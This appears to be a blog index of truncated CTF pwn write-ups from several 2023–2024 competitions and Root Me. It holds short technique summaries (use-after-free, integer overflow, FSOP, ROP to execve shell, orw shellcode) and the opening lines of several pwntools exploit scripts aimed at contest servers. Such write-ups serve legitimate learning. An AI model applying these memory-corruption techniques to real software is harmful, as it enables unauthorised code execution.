cr3 CTF 2024 - packet-maker
5th place
packet-maker (3 solves)
UAF in the unlink process of a linked list.
This is the unintended solution; the intended solution exploits the off-by-null vulnerability.
#!/usr/bin/python2
from pwn impor ...
Grey CTF 2024 - Heap Heap Heap
1st place〜^^
Heap Heap Heap (2 solves)
We can bypass the check for memory_needed > heap_heap.top_size via an integer overflow in the statement struct Node *node = heap_heap.top in the function halloc. This helps us leak the memory address and carry out the next step of the exploitation.
After leaking the base address, we can use the integer overflow in the statement struct Node *new_node = node->data + size to achieve an arbitrary memory allocation the next time we allocate a node usi ...
b01lers CTF 2024 - mixtpeailbc
1st place!!
mixtpeailbc (4 solves)
#!/usr/bin/python2
from pwn import *
from base64 import b64encode

def write_reg(reg1, reg2, imm):
    code = p8(1)
    code += p8(reg1)
    code += p8(reg2)
    code += p8(imm)
    return code

def load_reg(reg1, reg2, imm):
    code = p8(36)
    code += p8(reg1)
    code += p8(reg2)
    code += p8(imm)
    return code

def overwrite(re ...
WolvCTF 2024 - CScript
3rd place
CScript (4 solves)
There is a UAF vulnerability when we assign a value to a variable using the + statement. By exploiting this UAF we can achieve arbitrary code execution in the Print function. Finally, we just need to build our ROP chain and find a gadget that triggers a stack pivot to execute execve("/bin/sh", 0, 0).
from pwn import *

io = remote('cscript.wolvctf.io', 1337)
context.bits = 64
ru ...
GCC CTF 2024 - Flag Roulette
4th place
Flag Roulette
Malloc an mmap chunk to change the _IO_write_ptr of _IO_2_1_stdout_ and leak the libc address
Malloc another mmap chunk to change the _IO_buf_end of _IO_2_1_stdin_ so that we can overwrite the data of _IO_2_1_stdout_ with the next input
FSOP
from pwn import *

io = remote('worker03.gcc-ctf.com', 14964)
context.bits ...
Root Me challenges (Continuous Updates)
Some records of the challenges I have completed on Root Me.
App - System
ELF x64 - Advanced Heap Exploitation - Heap Leakless & Fortified (135 pts)
Exploit the UAF vulnerability to create a fake unsortedbin chunk by modifying the size of a chunk. Use the residual data of the unsortedbin chunk to land on the address of _IO_2_1_stdout_. Modify the last byte of _IO_write_base to \x08 so that we can leak the libc address. Hijack _IO_write_base to point at environ, and then we can leak the stack address.
No ...
BlackHat MEA 2023 - vec
The vulnerability is in this part: we can bypass the if statement via integer overflow, which lets us achieve an out-of-bounds write in the heap area.
Step 1: leak the heap address. The vector of the template class allocates twice the current memory size when the current memory is not enough. The first two times, it asks the heap allocator for 8 bytes and 16 bytes of memory, which returns a chunk of size 0x20 (in the following text, we refer to them as chunk a and c ...
TSG CTF 2023
Solved two PWN challenges, then logged off to catch up on homework (sad
converter2
The c32rtomb function returns -1 when the UTF-32 character passed to it is invalid; this can be used to make the pointer point to a negative index of the array. Write one group of UTF-32 character data at the tail of utf32_hexstr[3] so that one extra group is parsed when utf32_hexstr[3] is processed, and the flag is then carried out by the subsequent printf.
#!/usr/bin/python2
from pwn import *

# io = process('./chall')
io = remote('34.146.195.242', 40004)
ru = lambda x : io.recvuntil(x, drop = True)
sa = lambda a, b : io.sendafter(a, b)
sla = lambda a, b : io.sendlineafte ...
SEETF 2023 PWN
4th place
There were 5 PWN challenges in total; by the time I logged in, a teammate had already solved 1, and I solved the remaining 4.
Great Expectations
The floating-point input partially overwrites rbp; then stack pivot + ret2libc.
#!/usr/bin/python2
from pwn import *

context.binary = 'chall'
libc = ELF('libc.so.6', checksec = False)
sa = lambda a, b : io.sendafter(a, b)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 ...
MapleCTF 2023 lost-in-space
lost-in-space (11 solves)
The page with index 200 did not have its permissions changed by mprotect, and the sandbox only allows the syscall instruction to execute inside that page, so it is enough to write shellcode that searches for that address.
Because the search runs over an irregular graph (two directed edges pointing at the same node, cycles, and so on), a plain DFS/BFS is very inefficient and may loop forever (endlessly searching around the nodes of a cycle), so marking pages that have already been visited improves the success rate. I was too lazy to write that during the contest; simply running the BFS a few more times also got through (
Also, after finding the address where syscall can be executed, directly executing execve("/bin/sh", 0, 0) crashed (my guess is that the program munmap'ed too many addresses, so originally valid addresses became invalid, and the sh process reading from and writing to those unmapped addresses caused the crash). Switching to an orw (open/read/write) shellcode afterwards read the flag normally.